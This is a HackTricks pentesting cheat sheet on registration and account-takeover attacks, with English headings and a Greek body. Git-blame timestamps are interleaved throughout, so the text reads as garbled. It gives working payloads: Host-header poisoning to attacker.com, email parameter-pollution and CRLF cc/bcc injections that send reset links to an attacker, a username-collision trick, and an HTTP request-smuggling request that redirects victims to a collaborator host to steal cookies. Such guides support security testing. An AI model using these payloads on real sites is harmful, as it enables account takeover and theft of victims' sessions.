2024-09-04 13:40:55 +00:00
# Registration & Takeover Vulnerabilities
2022-04-28 16:01:33 +00:00
2024-07-19 16:35:17 +00:00
{% hint style="success" %}
2024-09-04 13:40:55 +00:00
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:35:17 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-09-04 13:40:55 +00:00
< summary > Support HackTricks< / summary >
2024-02-03 14:45:32 +00:00
2024-09-04 13:40:55 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:35:17 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-04-18 04:11:25 +00:00
2024-09-04 13:40:55 +00:00
## Registration Takeover
2024-04-18 04:11:25 +00:00
2024-09-04 13:40:55 +00:00
### Duplicate Registration
2021-06-27 14:55:59 +00:00
2024-07-19 16:35:17 +00:00
* Προσπαθήστε ν α δημιουργήσετε χρησιμοποιώντας ένα υπάρχον όνομα χρήστη
* Ελέγξτε ποικιλία στο email:
* κεφαλαία
* \+1@
* προσθέστε κάποιο τελεία στο email
* ειδικούς χαρακτήρες στο όνομα email (%00, %09, %20)
* Βάλτε μαύρους χαρακτήρες μετά το email: `test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
2021-06-27 14:55:59 +00:00
2024-09-04 13:40:55 +00:00
### Username Enumeration
2021-06-27 14:55:59 +00:00
2024-09-04 13:40:55 +00:00
Ελέγξτε α ν μπορείτε ν α καταλάβετε πότε ένα όνομα χρήστη έχει ήδη καταχωρηθεί μέσα στην εφαρμογή.
2021-06-27 14:55:59 +00:00
2024-09-04 13:40:55 +00:00
### Password Policy
2021-06-27 14:55:59 +00:00
2024-07-19 16:35:17 +00:00
Δημιουργώντας έναν χρήστη ελέγξτε την πολιτική κωδικών πρόσβασης (ελέγξτε α ν μπορείτε ν α χρησιμοποιήσετε αδύναμους κωδικούς).\
Σε αυτή την περίπτωση μπορείτε ν α προσπαθήσετε ν α κάνετε bruteforce τα διαπιστευτήρια.
2021-06-27 14:55:59 +00:00
2024-07-19 16:35:17 +00:00
### SQL Injection
2021-06-27 14:55:59 +00:00
2024-09-04 13:40:55 +00:00
[**Check this page** ](sql-injection/#insert-statement )γ ι α ν α μάθετε πώς ν α προσπαθήσετε ν α αναλάβετε λογαριασμούς ή ν α εξάγετε πληροφορίες μέσω **SQL Injections** σε φόρμες καταχώρησης.
2021-06-27 14:55:59 +00:00
2024-09-04 13:40:55 +00:00
### Oauth Takeovers
2021-06-27 14:55:59 +00:00
2023-02-16 18:26:56 +00:00
{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md ](oauth-to-account-takeover.md )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-06-27 14:55:59 +00:00
2024-09-04 13:40:55 +00:00
### SAML Vulnerabilities
2021-06-27 14:55:59 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="saml-attacks/" %}
[saml-attacks ](saml-attacks/ )
{% endcontent-ref %}
2021-06-27 15:43:01 +00:00
2024-09-04 13:40:55 +00:00
### Change Email
2021-06-27 15:43:01 +00:00
2024-09-04 13:40:55 +00:00
Όταν καταχωρηθείτε προσπαθήστε ν α αλλάξετε το email και ελέγξτε α ν αυτή η αλλαγή επικυρώνεται σωστά ή α ν μπορείτε ν α την αλλάξετε σε αυθαίρετα emails.
2021-06-27 14:55:59 +00:00
2024-09-04 13:40:55 +00:00
### More Checks
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
* Ελέγξτε α ν μπορείτε ν α χρησιμοποιήσετε **disposable emails**
* **Μακρύς** **κωδικός** (>200) οδηγεί σε **DoS**
* **Ελέγξτε τα όρια ρυθμού στη δημιουργία λογαριασμών**
2024-04-18 04:11:25 +00:00
* Χρησιμοποιήστε username@**burp\_collab**.net και αναλύστε το **callback**
2024-09-04 13:40:55 +00:00
## **Password Reset Takeover**
2024-04-18 04:11:25 +00:00
2024-09-04 13:40:55 +00:00
### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
2024-04-18 04:11:25 +00:00
2024-09-04 13:40:55 +00:00
1. Ζητήστε επαναφορά κωδικού πρόσβασης στη διεύθυνση email σας
2. Κάντε κλικ στον σύνδεσμο επαναφοράς κωδικού πρόσβασης
2024-04-18 04:11:25 +00:00
3. Μην αλλάξετε τον κωδικό
2024-07-19 16:35:17 +00:00
4. Κάντε κλικ σε οποιαδήποτε 3η ιστοσελίδα (π.χ.: Facebook, twitter)
5. Παρεμβάλετε το αίτημα στο Burp Suite proxy
2024-09-04 13:40:55 +00:00
6. Ελέγξτε α ν η κεφαλίδα referer διαρρέει το token επαναφοράς κωδικού πρόσβασης.
2024-04-18 04:11:25 +00:00
2024-09-04 13:40:55 +00:00
### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
2024-04-18 04:11:25 +00:00
2024-09-04 13:40:55 +00:00
1. Παρεμβάλετε το αίτημα επαναφοράς κωδικού πρόσβασης στο Burp Suite
2024-07-19 16:35:17 +00:00
2. Προσθέστε ή επεξεργαστείτε τις παρακάτω κεφαλίδες στο Burp Suite : `Host: attacker.com` , `X-Forwarded-Host: attacker.com`
2024-04-18 04:11:25 +00:00
3. Προωθήστε το αίτημα με την τροποποιημένη κεφαλίδα\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
2024-09-04 13:40:55 +00:00
4. Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού πρόσβασης με βάση την _κεφα λίδα host_ όπως : `https://attacker.com/reset-password.php?token=TOKEN`
2024-04-18 04:11:25 +00:00
2024-09-04 13:40:55 +00:00
### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
2021-11-30 00:17:48 +00:00
```powershell
# parameter pollution
email=victim@mail.com& email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
2024-07-19 16:35:17 +00:00
### IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
2021-11-30 00:17:48 +00:00
2024-09-04 13:40:55 +00:00
1. Ο επιτιθέμενος πρέπει ν α συνδεθεί με τον λογαριασμό του και ν α μεταβεί στη λειτουργία **Αλλαγή κωδικού** .
2. Ξεκινήστε το Burp Suite και παγώστε το αίτημα.
2024-07-19 16:35:17 +00:00
3. Στείλτε το στην καρτέλα επαναλήπτη και επεξεργαστείτε τις παραμέτρους: User ID/email\
2024-02-10 22:40:18 +00:00
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
2024-09-04 13:40:55 +00:00
Τ ο token επαναφοράς κωδικού πρέπει ν α δημιουργείται τυχαία και ν α είναι μοναδικό κάθε φορά.\
Δοκιμάστε ν α προσδιορίσετε α ν το token λήγει ή α ν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί ν α μαντευτεί. Ο ι παρακάτω μεταβλητές μπορεί ν α χρησιμοποιηθούν από τον αλγόριθμο.
2021-11-30 00:17:48 +00:00
2024-09-04 13:40:55 +00:00
* Χρονική σήμανση
2024-07-19 16:35:17 +00:00
* UserID
* Email του χρήστη
2024-04-18 04:11:25 +00:00
* Όνομα και Επώνυμο
* Ημερομηνία Γέννησης
2024-02-10 22:40:18 +00:00
* Κρυπτογραφία
* Μόνο αριθμοί
2024-07-19 16:35:17 +00:00
* Μικρή ακολουθία token (χαρακτήρες μεταξύ \[A-Z,a-z,0-9])
* Επαναχρησιμοποίηση token
* Ημερομηνία λήξης token
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
### Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
2024-09-04 13:40:55 +00:00
1. Προκαλέστε ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI γ ι α μια συγκεκριμένη διεύθυνση email π.χ: test@mail.com
2024-07-19 16:35:17 +00:00
2. Εξετάστε την απάντηση του διακομιστή και ελέγξτε γ ι α `resetToken`
3. Στη συνέχεια, χρησιμοποιήστε το token σε μια διεύθυνση URL όπως `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
### Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
1. Εγγραφείτε στο σύστημα με ένα όνομα χρήστη ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά διαστήματα πριν και/ή μετά το όνομα χρήστη. π.χ: `"admin "`
2024-09-04 13:40:55 +00:00
2. Ζητήστε μια επαναφορά κωδικού με το κακόβουλο όνομα χρήστη σας.
3. Χρησιμοποιήστε το token που στάλθηκε στο email σας και επαναφέρετε τον κωδικό του θύματος.
4. Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό.
2021-11-30 00:17:48 +00:00
2024-09-04 13:40:55 +00:00
Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτή την επίθεση.\
2024-02-10 22:40:18 +00:00
Δείτε: [CVE-2020-7245 ](https://nvd.nist.gov/vuln/detail/CVE-2020-7245 )
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
1. Βρείτε ένα XSS μέσα στην εφαρμογή ή σε μια υποτομέα α ν τα cookies είναι περιορισμένα στον γονικό τομέα: `*.domain.com`
2024-02-10 22:40:18 +00:00
2. Διαρρεύστε το τρέχον **cookie συνεδρίας**
2024-07-19 16:35:17 +00:00
3. Αυθεντικοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
1\. Χρησιμοποιήστε **smuggler** γ ι α ν α ανιχνεύσετε τον τύπο HTTP Request Smuggling (CL, TE, CL.TE)\
2021-11-30 00:17:48 +00:00
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h` \
2024-07-19 16:35:17 +00:00
2\. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το `POST / HTTP/1.1` με τα παρακάτω δεδομένα:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` με στόχο ν α ανοίξετε ανακατεύθυνση των θυμάτων στο burpcollab και ν α κλέψετε τα cookies τους\
3\. Τ ο τελικό αίτημα θα μπορούσε ν α μοιάζει με το εξής
2021-11-30 00:17:48 +00:00
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
2024-07-19 16:35:17 +00:00
Hackerone reports exploiting this bug\
\* [https://hackerone.com/reports/737140 ](https://hackerone.com/reports/737140 )\
\* [https://hackerone.com/reports/771666 ](https://hackerone.com/reports/771666 )
### Account Takeover via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
1. Δημιουργήστε ένα payload γ ι α το CSRF, π.χ: “HTML φόρμα με αυτόματη υποβολή γ ι α αλλαγή κωδικού”
2. Στείλτε το payload
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
### Account Takeover via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
2021-11-30 00:17:48 +00:00
2024-07-19 16:35:17 +00:00
Τ ο JSON Web Token μπορεί ν α χρησιμοποιηθεί γ ι α την αυθεντικοποίηση ενός χρήστη.
2021-11-30 00:17:48 +00:00
2024-04-18 07:07:09 +00:00
* Επεξεργαστείτε το JWT με άλλο User ID / Email
2024-02-10 22:40:18 +00:00
* Ελέγξτε γ ι α αδύναμη υπογραφή JWT
2021-11-30 00:17:48 +00:00
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md ](hacking-jwt-json-web-tokens.md )
{% endcontent-ref %}
2024-07-19 16:35:17 +00:00
## References
2021-11-30 00:17:48 +00:00
* [https://salmonsec.com/cheatsheet/account\_takeover ](https://salmonsec.com/cheatsheet/account\_takeover )
2022-04-28 16:01:33 +00:00
2024-04-18 04:11:25 +00:00
2024-07-19 16:35:17 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-04-18 04:11:25 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-07-19 16:35:17 +00:00
< summary > Support HackTricks< / summary >
2024-02-03 14:45:32 +00:00
2024-07-19 16:35:17 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:35:17 +00:00
{% endhint %}